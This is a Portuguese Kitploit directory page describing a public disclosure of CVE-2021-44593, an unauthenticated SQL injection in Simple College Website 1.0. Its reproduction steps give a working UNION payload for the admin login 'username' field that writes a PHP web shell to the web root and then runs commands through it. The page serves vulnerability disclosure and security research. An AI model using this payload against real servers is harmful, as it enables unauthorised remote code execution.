Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-44593 — Divulgação pública e writeup do CVE-2021-44593, uma injeção SQL não autenticada no Simple College Website que leva a upload arbitrário de arquivos e execução remota de código. | Kitploit
Ferramentas/GitHubGitHub/mister-joe/cve-2021-44593
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubmister-joe/cve-2021-44593

CVE-2021-44593

Divulgação pública e writeup do CVE-2021-44593, uma injeção SQL não autenticada no Simple College Website que leva a upload arbitrário de arquivos e execução remota de código.

Ver Repositório
22há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-44593

Divulgação pública da CVE-2021-44593. Uma vulnerabilidade de injeção SQL/upload arbitrário de arquivos/execução remota de código no Simple College Website.

DESCRIÇÃO

O Simple College Website 1.0 é vulnerável a uma injeção SQL baseada em UNION não autenticada no parâmetro "username" da página /admin/login.php, que pode então ser explorada para fazer upload de arquivos arbitrários e obter execução remota de código.

COMPONENTES AFETADOS

A função login() em admin_class.php

PASSOS PARA REPRODUZIR

  1. Acesse a página de login do administrador (geralmente /admin/login.php)
  2. Envie o formulário de login com o parâmetro POST "username" contendo a seguinte injeção SQL baseada em UNION:
root@kitploit:~
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -
  1. Navegue até /testing.php?cmd=id

NOTAS

  1. É necessário conhecer a localização do diretório raiz do servidor web.
  2. Também pode ser necessário conhecer a localização do diretório raiz do documento, caso não seja o mesmo que o diretório raiz do servidor web.
  3. Além disso, o daemon do MySQL precisa ter permissões de escrita no referido diretório.
Baixar ferramenta